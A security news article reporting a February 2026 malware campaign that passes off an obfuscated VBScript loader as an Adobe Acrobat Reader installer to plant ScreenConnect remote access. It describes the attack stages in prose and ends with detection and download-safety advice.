A new cyberattack campaign is targeting users by disguising malware as a legitimate download of Adobe Acrobat Reader. The attack tricks users into installing remote access software without their knowledge and it gives attackers full control of the system.
Security researchers at Zscaler ThreatLabz discovered this campaign in February 2026. The attack uses advanced techniques to stay hidden and avoid detection.
The attack starts with a fake website that looks similar to Adobe’s official page. When a user visits the site and clicks the download button, a malicious file is automatically downloaded. This file is a VBScript named Acrobat_Reader_V112_6971.vbs, which pretends to be a normal installer. This script acts as the initial loader and is designed to evade static analysis by dynamically constructing critical objects and commands at runtime.
The script is heavily obfuscated. It does not expose any clear indicators. Instead of writing commands directly, it builds them during execution. This is a common trick, but the level of obfuscation here suggests the attackers want to avoid both static and basic behavioral detection.
After execution, the script launches PowerShell with execution policy bypass. This is a red flag. It then pulls the next stage from a remote source and executes everything in memory. No files are dropped on disk, which makes forensic analysis difficult.
This in-memory execution is the core strength of this attack. It reduces artifacts and keeps the attack under the radar. The attackers also manipulate the process identity. The malware pretends to be a legitimate Windows process. Many tools still rely on process names and metadata, so this can help bypass detection.
Also read: Best PDF Reader Apps for Android and iOS
Another interesting part is the privilege escalation. The attack abuses auto-elevated COM objects to bypass UAC. This means it gains admin-level access without showing any prompt. This is not new, but combining it with fileless execution makes it more effective.
In the final stage, the attack installs ConnectWise ScreenConnect. This is a legitimate tool, which is why many security solutions may not flag it. Once installed, the attacker gets full remote access. At this point, they can do anything. Data theft, lateral movement, or even long-term persistence.
This campaign clearly shows that attackers aren’t relying on custom malware anymore. They are using trusted tools and system features to stay hidden. They are using techniques to avoid detection by traditional antivirus. So, it needs behavioral monitoring to detect such malware. Unusual PowerShell activity, silent MSI installations, and unexpected use of remote access tools should be treated seriously.
I advise users not to download software from unknown sources, even if the page looks real. They must always check the website URL before clicking the download button.
Related Posts
